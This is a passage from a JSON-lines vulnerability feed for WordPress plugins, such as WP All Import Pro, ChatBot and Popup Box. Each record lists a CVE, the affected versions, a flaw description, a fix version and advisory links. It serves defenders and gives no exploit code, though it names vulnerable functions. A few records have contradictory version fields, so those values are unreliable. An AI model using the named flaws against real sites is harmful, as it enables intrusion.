version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6215fa9f-06bc-4dc8-b1f5-a3bb75749f1d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6215fa9f-06bc-4dc8-b1f5-a3bb75749f1d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/aramhairchitects.nl\\\/\",\"name\":\"https:\\\/\\\/aramhairchitects.nl\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpdocs.latepoint.com\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/wpdocs.latepoint.com\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0855","slug":"spiffy-calendar","versionImpact":"4.9.8","versionEndExcluding":"4.9.9","description":"The Spiffy Calendar WordPress plugin before 4.9.9 doesn't check the event_author parameter, and allows any user to alter it when creating an event, leading to deceiving users\/admins that a page was created by a Contributor+.","recommendation":"Update to version 4.9.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5d5da91e-3f34-46b0-8db2-354a88bdf934\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5d5da91e-3f34-46b0-8db2-354a88bdf934\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8722","slug":"wp-all-import-pro","versionImpact":"4.9.7","versionEndExcluding":"4.9.8","description":"The Import any XML or CSV File to WordPress PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 4.9.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","recommendation":"Update to version 4.9.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dbc6ad3f-698e-4dfd-bbba-086f94831bba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dbc6ad3f-698e-4dfd-bbba-086f94831bba?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpallimport.com\\\/downloads\\\/wp-all-import-annual\\\/?changelog=1\",\"name\":\"https:\\\/\\\/www.wpallimport.com\\\/downloads\\\/wp-all-import-annual\\\/?changelog=1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10861","slug":"ays-popup-box","versionImpact":"4.9.7","versionEndExcluding":"4.9.8","description":"The Popup Box \u2013 Create Countdown, Coupon, Video, Contact Form Popups plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the deactivate_plugin_option() function in all versions up to, and including, 4.9.7. This makes it possible for unauthenticated attackers to update the 'ays_pb_upgrade_plugin' option with arbitrary data.","recommendation":"Update to version 4.9.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3717e03-9a18-48a1-97d3-1d41c7f93261?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c3717e03-9a18-48a1-97d3-1d41c7f93261?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ays-popup-box\\\/tags\\\/4.9.2\\\/admin\\\/class-ays-pb-admin.php#L609\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ays-popup-box\\\/tags\\\/4.9.2\\\/admin\\\/class-ays-pb-admin.php#L609\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188357\\\/ays-popup-box\\\/tags\\\/4.9.8\\\/admin\\\/class-ays-pb-admin.php?old=3186262&old_path=ays-popup-box%2Ftags%2F4.9.7%2Fadmin%2Fclass-ays-pb-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188357\\\/ays-popup-box\\\/tags\\\/4.9.8\\\/admin\\\/class-ays-pb-admin.php?old=3186262&old_path=ays-popup-box%2Ftags%2F4.9.7%2Fadmin%2Fclass-ays-pb-admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9664","slug":"wp-all-import-pro","versionImpact":"4.9.7","versionEndExcluding":"4.9.8","description":"The WP All Import Pro plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 4.9.7 via deserialization of untrusted input from an import file. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 4.9.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0099a8d7-827d-4215-9a2b-b3c268fb5e97?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0099a8d7-827d-4215-9a2b-b3c268fb5e97?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpallimport.com\\\/\",\"name\":\"https:\\\/\\\/www.wpallimport.com\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9661","slug":"wp-all-import-pro","versionImpact":"4.9.7","versionEndExcluding":"4.9.8","description":"The WP All Import Pro plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.9.7. This is due to missing nonce validation on the delete_and_edit function. This makes it possible for unauthenticated attackers to delete imported content (posts, comments, users, etc.) via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 4.9.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5f8659a-fb3f-4df3-85a6-979751627a9c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5f8659a-fb3f-4df3-85a6-979751627a9c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpallimport.com\",\"name\":\"https:\\\/\\\/www.wpallimport.com\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3527","slug":"eventON","versionImpact":"4.9.6","versionEndExcluding":"4.9.7","description":"The EventON Pro plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check in the 'assets\/lib\/settings\/settings.js' file in all versions up to, and including, 4.9.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability was partially patched in version 4.9.6.","recommendation":"Update to version 4.9.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/eventon-wordpress-event-calendar-plugin\\\/1211017#item-description__change-log\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/eventon-wordpress-event-calendar-plugin\\\/1211017#item-description__change-log\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/549ca9cf-0183-4c19-9bd5-b6d55a69df31?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/549ca9cf-0183-4c19-9bd5-b6d55a69df31?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9435","slug":"shiftcontroller","versionImpact":"4.9.66","versionEndExcluding":"4.9.67","description":"The ShiftController Employee Shift Scheduling plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via URL keys in all versions up to, and including, 4.9.66 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 4.9.67, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd3a198c-7c24-45b1-95a7-eb16472a51e2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dd3a198c-7c24-45b1-95a7-eb16472a51e2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/tags\\\/4.9.66\\\/shiftcontroller\\\/trunk\\\/hc3\\\/post.php#L61\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/tags\\\/4.9.66\\\/shiftcontroller\\\/trunk\\\/hc3\\\/post.php#L61\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161880\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161880\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6465","slug":"wp-links-page","versionImpact":"4.9.5","versionEndExcluding":"4.9.6","description":"The WP Links Page plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wplf_ajax_update_screenshots' function in all versions up to, and including, 4.9.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to regenerate the link's thumbnail image.","recommendation":"Update to version 4.9.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b59d281-d5c8-455a-8aa8-b03847bdd45f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b59d281-d5c8-455a-8aa8-b03847bdd45f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-links-page\\\/trunk\\\/wp-links-page-free.php#L172\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-links-page\\\/trunk\\\/wp-links-page-free.php#L172\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3116973\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3116973\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8488","slug":"survey-maker","versionImpact":"4.9.5","versionEndExcluding":"4.9.6","description":"The Survey Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Survey fields in all versions up to, and including, 4.9.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 4.9.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e04edb6-ef37-4ea8-a734-dbdcf689ba9b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5e04edb6-ef37-4ea8-a734-dbdcf689ba9b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3155029\\\/survey-maker\\\/tags\\\/4.9.6\\\/includes\\\/class-survey-maker-data.php?old=3153722&old_path=survey-maker%2Ftags%2F4.9.5%2Fincludes%2Fclass-survey-maker-data.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3155029\\\/survey-maker\\\/tags\\\/4.9.6\\\/includes\\\/class-survey-maker-data.php?old=3153722&old_path=survey-maker%2Ftags%2F4.9.5%2Fincludes%2Fclass-survey-maker-data.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9624","slug":"wp-all-import-pro","versionImpact":"4.9.3","versionEndExcluding":"4.9.4","description":"The WP All Import Pro plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 4.9.3 due to missing SSRF protection on the pmxi_curl_download function. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. On cloud platforms, it might allow attackers to read the Instance metadata.","recommendation":"Update to version 4.9.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eabde2e7-5cd4-4c3e-959a-69e04f6350d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eabde2e7-5cd4-4c3e-959a-69e04f6350d3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpallimport.com\",\"name\":\"https:\\\/\\\/www.wpallimport.com\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7027","slug":"woocommerce-pdf-vouchers","versionImpact":"4.9.3","versionEndExcluding":"4.9.4","description":"The WooCommerce - PDF Vouchers plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 4.9.3. This is due to insufficient verification on the user being supplied during a QR code login through the plugin. This makes it possible for unauthenticated attackers to log in as any existing Voucher Vendor user on the site, if they have access to the user id.","recommendation":"Update to version 4.9.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6cf27d9-c0be-4cff-8867-19297f6d79d7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6cf27d9-c0be-4cff-8867-19297f6d79d7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-pdf-vouchers-ultimate-gift-cards-wordpress-plugin\\\/7392046\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-pdf-vouchers-ultimate-gift-cards-wordpress-plugin\\\/7392046\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0630","slug":"wp-slimstat","versionEndExcluding":"4.9.3.3","description":"The Slimstat Analytics WordPress plugin before 4.9.3.3 does not prevent subscribers from rendering shortcodes that concatenates attributes directly into an SQL query.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b82bdd02-b699-4527-86cc-d60b56ab0c55\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b82bdd02-b699-4527-86cc-d60b56ab0c55\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4797","slug":"newsletters-lite","versionImpact":"4.9.2","versionEndExcluding":"4.9.3","description":"The Newsletters WordPress plugin before 4.9.3 does not properly escape user-controlled parameters when they are appended to SQL queries and shell commands, which could enable an administrator to run arbitrary commands on the server.","recommendation":"Update to version 4.9.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/de169fc7-f388-4abb-ab94-12522fd1ac92\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/de169fc7-f388-4abb-ab94-12522fd1ac92\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5241","slug":"chatbot","versionImpact":"4.8.9","versionEndExcluding":"4.9.3","description":"The AI ChatBot for WordPress is vulnerable to Directory Traversal in versions up to, and including, 4.8.9 via the qcld_openai_upload_pagetraining_file function. This allows subscriber-level attackers to append \"<?php\" to any existing file on the server resulting in potential DoS when appended to critical files such as wp-config.php.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2977505%40chatbot%2Ftrunk&old=2967435%40chatbot%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2977505%40chatbot%2Ftrunk&old=2967435%40chatbot%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/includes\\\/openai\\\/qcld-bot-openai.php#L376\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/includes\\\/openai\\\/qcld-bot-openai.php#L376\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25199281-5286-4d75-8d27-26ce215e0993?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25199281-5286-4d75-8d27-26ce215e0993?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5807","slug":"gwolle-gb","versionImpact":"4.9.2","versionEndExcluding":"4.9.3","description":"The Gwolle Guestbook plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018gwolle_gb_content\u2019 parameter in all versions up to, and including, 4.9.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.9.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3316455\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3316455\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/956f86c5-05af-41c3-a779-5b25f62122dd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/956f86c5-05af-41c3-a779-5b25f62122dd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1453","slug":"category-posts","versionImpact":"4.9.19","versionEndExcluding":"4.9.20","description":"The Category Posts Widget WordPress plugin before 4.9.20 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.9.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6bf93a34-a19f-4266-a95d-033551db43e6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6bf93a34-a19f-4266-a95d-033551db43e6\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6bf93a34-a19f-4266-a95d-033551db43e6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6bf93a34-a19f-4266-a95d-033551db43e6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9638","slug":"category-posts","versionImpact":"4.9.17","versionEndExcluding":"4.9.18","description":"The Category Posts Widget WordPress plugin before 4.9.18 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.9.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/119d5249-48e4-429e-8a1d-ad112e0c966d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/119d5249-48e4-429e-8a1d-ad112e0c966d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8680","slug":"mailchimp-for-wp","versionImpact":"4.9.16","versionEndExcluding":"4.9.17","description":"The MC4WP: Mailchimp for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 4.9.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 4.9.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa464547-0380-4b91-a5ea-0cd9a66da7a7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa464547-0380-4b91-a5ea-0cd9a66da7a7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/ibericode\\\/mailchimp-for-wordpress\\\/blob\\\/main\\\/includes\\\/views\\\/parts\\\/lists-overview-details.php\",\"name\":\"https:\\\/\\\/github.com\\\/ibericode\\\/mailchimp-for-wordpress\\\/blob\\\/main\\\/includes\\\/views\\\/parts\\\/lists-overview-details.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mailchimp-for-wp\\\/trunk\\\/includes\\\/views\\\/parts\\\/lists-overview-details.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mailchimp-for-wp\\\/trunk\\\/includes\\\/views\\\/parts\\\/lists-overview-details.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/ibericode\\\/mailchimp-for-wordpress\\\/commit\\\/60c6bfc260a7974f791af1d4ad4a032a3e0bdd3c\",\"name\":\"https:\\\/\\\/github.com\\\/ibericode\\\/mailchimp-for-wordpress\\\/commit\\\/60c6bfc260a7974f791af1d4ad4a032a3e0bdd3c\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3153075%40mailchimp-for-wp%2Ftrunk&old=3149806%40mailchimp-for-wp%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3153075%40mailchimp-for-wp%2Ftrunk&old=3149806%40mailchimp-for-wp%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3269","slug":"download-monitor","versionImpact":"4.9.13","versionEndExcluding":"4.9.14","description":"The Download Monitor plugin for WordPress is vulnerable to unauthorized access to functionality due to a missing capability check on the dlm_uninstall_plugin function in all versions up to, and including, 4.9.13. This makes it possible for authenticated attackers to uninstall the plugin and delete its data.","recommendation":"Update to version 4.9.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c454a958-91c4-4847-91f6-dedebf857964?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c454a958-91c4-4847-91f6-dedebf857964?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3092928\\\/download-monitor\\\/trunk?contextall=1&old=3070504&old_path=%2Fdownload-monitor%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3092928\\\/download-monitor\\\/trunk?contextall=1&old=3070504&old_path=%2Fdownload-monitor%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0275","slug":"wordpress-easy-paypal-payment-or-donation-accept-plugin","versionEndExcluding":"4.9.10","description":"The Easy Accept Payments for PayPal WordPress plugin before 4.9.10 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aab5d803-d621-4b12-a901-ff4447334d88\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aab5d803-d621-4b12-a901-ff4447334d88\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3888","slug":"jupiterx-core","versionImpact":"4.8.12","versionEndExcluding":"4.9.1","description":"The Jupiter X Core plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File inclusion in all versions up to, and including, 4.8.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the page with the included SVG file.","recommendation":"Update to version 4.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/modules\\\/inline-svg\\\/widgets\\\/inline-svg.php#L304\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jupiterx-core\\\/trunk\\\/includes\\\/extensions\\\/raven\\\/includes\\\/modules\\\/inline-svg\\\/widgets\\\/inline-svg.php#L304\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3292376\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3292376\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f36f1ea5-62f7-48f0-a8d3-a56e0c9915d7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f36f1ea5-62f7-48f0-a8d3-a56e0c9915d7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5254","slug":"chatbot","versionImpact":"4.8.9","versionEndExcluding":"4.9.1","description":"The ChatBot plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.8.9 via the qcld_wb_chatbot_check_user function. This can allow unauthenticated attackers to extract sensitive data including confirmation as to whether a user name exists on the site as well as order information for existing users.","recommendation":"Update to version 4.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d897daf8-5320-4546-9a63-1d34a15b2a58?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d897daf8-5320-4546-9a63-1d34a15b2a58?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2977505%40chatbot%2Ftrunk&old=2967435%40chatbot%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2977505%40chatbot%2Ftrunk&old=2967435%40chatbot%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/functions.php#L1224\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/functions.php#L1224\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5212","slug":"chatbot","versionImpact":"4.9.2","versionEndExcluding":"4.9.1","description":"The AI ChatBot plugin for WordPress is vulnerable to Arbitrary File Deletion in versions up to, and including, 4.8.9. This makes it possible for authenticated attackers with subscriber privileges to delete arbitrary files on the server, which makes it possible to take over affected sites as well as others sharing the same hosting account.","recommendation":"Update to one of the following versions, or a newer patched version: 4.9.1, 4.9.3","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2977505%40chatbot%2Ftrunk&old=2967435%40chatbot%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2977505%40chatbot%2Ftrunk&old=2967435%40chatbot%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b3f4ccb-fcc6-42ec-8e9e-03d69ae7acf2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b3f4ccb-fcc6-42ec-8e9e-03d69ae7acf2?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/includes\\\/openai\\\/qcld-bot-openai.php?rev=2957286#L576\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/chatbot\\\/trunk\\\/includes\\\/openai\\\/qcld-bot-openai.php?rev=2957286#L576\",\"refsource\":\"MISC\",\"tags\":[]}]"}
